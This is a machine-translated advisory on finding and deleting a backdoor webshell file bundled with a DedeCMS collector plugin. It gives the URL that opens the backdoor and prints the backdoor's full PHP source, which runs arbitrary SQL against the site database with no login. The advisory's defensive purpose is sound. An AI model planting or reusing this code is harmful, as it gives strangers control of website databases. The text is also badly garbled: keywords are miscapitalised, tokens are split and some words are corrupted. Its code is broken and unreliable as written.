How to delete the official webshell of the dede collector

Remove the official webshell: After the collection master is installed, immediately delete dedesql under the include directory. query. PHP file. If it has been installed, it may have been renamed to arc. sqlquery. class. php, find and delete it. This file can be used to query the website database without logon verification, and perform operations such as updating, deleting, and querying data. You can also test whether the method is as follows:
Http: // your domain name. com/include/dedesql. query. php. php? Dopost = viewinfo
Enter the URL above to open the webshell interface.
To be honest, the best way is to leave a backdoor program intentionally. This backdoor has been discovered. God knows whether more backdoors will emerge in the next so-called new version. The code for the subsequent file is as follows:
Copy codeThe Code is as follows:
<? Php
Require_once (dirname (_ FILE _). "/../include/common. inc. php ");
If (emptyempty ($ dopost ))
{
$ Dopost = "";
}
If ($ dopost = "rename ")
{
If (rename ('dedesql. query. php', 'arc. sqlquery. class. php ')){
Echo "successful! ";
} Else {
Echo "failed! ";
}
Exit ();
}
If ($ dopost = "viewinfo ")
{
If (emptyempty ($ tablename ))
{
Echo "no table name specified! ";
}
Else
{
$ Dsql-> SetQuery ("show create table". $ dsql-> dbName. ".". $ tablename );
$ Dsql-> Execute ('me ');
$ Row2 = $ dsql-> GetArray ('me', MYSQL_BOTH );
$ Ctinfo = $ row2 [1];
Echo "<xmp>". trim ($ ctinfo). "</xmp> ";
}
Exit ();
}
If ($ dopost = "index ")
{
Require_once (DEDEINC. '/arc. partview. class. php ');
$ Envs = $ _ sys_globals = array ();
$ Envs ['aid '] = 0;
$ Pv = new PartView ();
$ Row = $ pv-> dsql-> GetOne ('select * From 'dede _ homepageset '');
$ Templet = str_replace ("{style}", $ pai_df_style, $ row ['templet']);
$ HomeFile = dirname (_ FILE _). '/'. $ row ['position'];
$ HomeFile = str_replace ("//", "/", str_replace ("\", "/", $ homeFile ));
$ Fp = fopen ($ homeFile, 'w') or die ("unable to update website homepage to: $ homeFile location ");
Fclose ($ fp );
$ Tpl = $ pai_basedir. $ pai_templets_dir. '/'. $ templet;
$ Pv-> SetTemplet ($ tpl );
$ Pv-> SaveToHtml ($ homeFile );
$ Pv-> Close ();
Echo "homepage updated successfully! ";
Exit ();
}
Else if ($ dopost = "query ")
{
$ Sqlquery = trim (stripslashes ($ sqlquery ));
If (eregi ("drop (. *) table", $ sqlquery) | eregi ("drop (. *) database", $ sqlquery ))
{
Echo "<span style = 'font-size: 10pt '> statements for deleting 'data' or 'database' cannot be executed here. </Span> ";
Exit ();
}
If (eregi ("^ select", $ sqlquery ))
{
$ Dsql-> SetQuery ($ sqlquery );
$ Dsql-> Execute ();
If ($ dsql-> GetTotalRow () <= 0)
{
Echo "run SQL: {$ sqlquery}, no returned records! ";
}
Else
{
Echo "run SQL: {$ sqlquery}, total". $ dsql-> GetTotalRow (). "records, up to 100 records are returned! ";
}
$ J = 0;
While ($ row = $ dsql-> GetArray ())
{
$ J ++;
If ($ j> 100)
{
Break;
}
Echo "Echo "record: $ j ";
Echo "Foreach ($ row as $ k => $ v)
{
Echo "<font color = 'red' >{$ k }:</font >{$ v} <br/> \ r \ n ";
}
}
Exit ();
}
If ($ querytype = 2)
{
$ Sqlquery = str_replace ("\ r", "", $ sqlquery );
$ Sqls = split ("; [\ t] {0 ,}\ n", $ sqlquery );
$ NerrCode = ""; $ I = 0;
Foreach ($ sqls as $ q)
{
$ Q = trim ($ q );
If ($ q = "")
{
Continue;
}
$ Dsql-> ExecuteNoneQuery ($ q );
$ ErrCode = trim ($ dsql-> GetError ());
If ($ errCode = "")
{
$ I ++;
}
Else
{
$ NerrCode. = "execution: <font color = 'blue'> $ q </font> error. error message: <font color = 'red'> ". $ errCode. "</font> <br> ";
}
}
Echo "{$ I} SQL statements are successfully executed! <Br> ";
Echo $ nerrCode;
}
Else
{
$ Dsql-> ExecuteNoneQuery ($ sqlquery );
$ NerrCode = trim ($ dsql-> GetError ());
Echo "one SQL statement is successfully executed! <Br> ";
Echo $ nerrCode;
}
Exit ();
}
If ($ dopost = "view ")
{
; Echo '<Head>
<Meta http-equiv = \ 'content-Type \ 'content = \ 'text/html; charset = gb2312 \ '>
<Title> SQL command line tool </title>
<Link href = \ 'img/base.css \ 'rel = \ 'stylesheet \ 'Type = \ 'text/css \ '>
</Head>
<Body background = \ 'img/allbg.gif \ 'leftmargin = \ '8 \ 'topmargin = \ '8 \ '>
<Table width = "98%" border = "0" align = "center" cellpadding = "3" cellspacing = "1" bgcolor = "# D1DDAA">
<Tr>
<Td height = "19" background = "img/tbg.gif">
<Table width = "96%" border = "0" cellspacing = "1" cellpadding = "1">
<Tr>
<Td width = "24%"> <strong> SQL command Runner: </strong> </td>
<Td width = "76%" align = "right"> <B> <a href = "sys_data.php"> <u> data backup </u> </a> </B>
| <B> <a href = "sys_data_revert.php"> <strong> <u> data restoration </u> </strong> </a> </B>
</Td>
</Tr>
</Table>
</Td>
</Tr>
<Tr>
<Td height = "200" bgcolor = "# FFFFFF" valign = "top">
<Table width = "100%" border = "0" cellspacing = "4" cellpadding = "2">
<Form action = "" method = "post" name = "infoform" target = "stafrm">
<Input type = \ 'den den \ 'name = \ 'dopost \ 'value = \ 'viewinfo \'/>
<Tr bgcolor = "# F3FBEC">
<Td width = "15%" height = "24" align = "center"> system table information: </td>
<Td>
<Table width = "100%" border = "0" cellspacing = "0" cellpadding = "0">
<Tr>
& Lt; td width = "35%" & gt;
<Select name = "tablename" id = "tablename" style = "width: 100%" size = "6">
';
$ Dsql-> SetQuery ("Show Tables ");
$ Dsql-> Execute ('T ');
While ($ row = $ dsql-> GetArray ('T', MYSQL_BOTH ))
{
$ Dsql-> SetQuery ("Select count (*) From". $ row [0]);
$ Dsql-> Execute ('n ');
$ Row2 = $ dsql-> GetArray ('n', MYSQL_BOTH );
$ Dd = $ row2 [0];
Echo "<option value = '". $ row [0]. "'> ". $ row [0]. "(". $ dd. ") </option> \ r \ n ";
}
; Echo '</select>
</Td>
<Td width = "2%"> </td>
<Td width = "63%" valign = "bottom">
<Div style = "float: left; margin-right: 20px;">
<Input type = "Submit" name = "Submit1" value = "optimize the selected table" class = "coolbg np" onClick = "this. form. dopost. value = \ 'opimize \ '; "/>
<Br/>
<Input type = "Submit" name = "Submit2" value = "fixed the selected table" class = "coolbg np" onClick = "this. form. dopost. value = \ 'repair \ '; "style =" margin-top: 6px; "/>
<Br/>
<Input type = "Submit" name = "Submit3" value = "View table structure" class = "coolbg np" onClick = "this. form. dopost. value = \ 'viewinfo \ '; "style =" margin-top: 6px; "/>
</Div>
<Div style = "float: left">
<Input type = "Submit" name = "Submit5" value = "optimize all tables" class = "coolbg np" onClick = "this. form. dopost. value = \ 'opimizeall \ '; "/>
<Br/>
<Input type = "Submit" name = "Submit6" value = "repair all tables" class = "coolbg np" onClick = "this. form. dopost. value = \ 'repairall \ '; "style =" margin-top: 6px; "/>
</Div>
</Td>
</Tr>
</Table> </td>
</Tr>
<Tr>
<Td height = "200" align = "center"> return information: </td>
<Td>
<Iframe name = "stafrm" frameborder = "0" id = "stafrm" width = "100%" height = "100%"> </iframe>
</Td>
</Tr>
</Form>
<Form action = "" method = "post" name = "form1" target = "stafrm">
<Input type = \ 'den den \ 'name = \ 'dopost \ 'value = \ 'query \'>
<Tr>
<Td height = "24" colspan = "2" bgcolor = "# F3FBEC"> <strong> run the SQL command line:
<Input name = "querytype" type = "radio" class = "np" value = "0">
Single-line command (supports simple query)
<Input name = "querytype" type = "radio" class = "np" value = "2" checked>
Multi-line command </strong> </td>
</Tr>
<Tr>
<Td height = "118" colspan = "2">
<Textarea name = "sqlquery" cols = "60" rows = "10" id = "sqlquery" style = "width: 90%"> </textarea>
</Td>
</Tr>
<Tr>
<Td height = "53" align = "center"> </td>
<Td>
<Input name = "imageField" type = "image" src = "img/button_ OK .gif" width = "60" height = "22" border = "0" class = \ 'np \ '/>
</Td>
</Tr>
</Form>
</Table>
</Td>
</Tr>
</Table>
</Body>
</Html>
';}
?>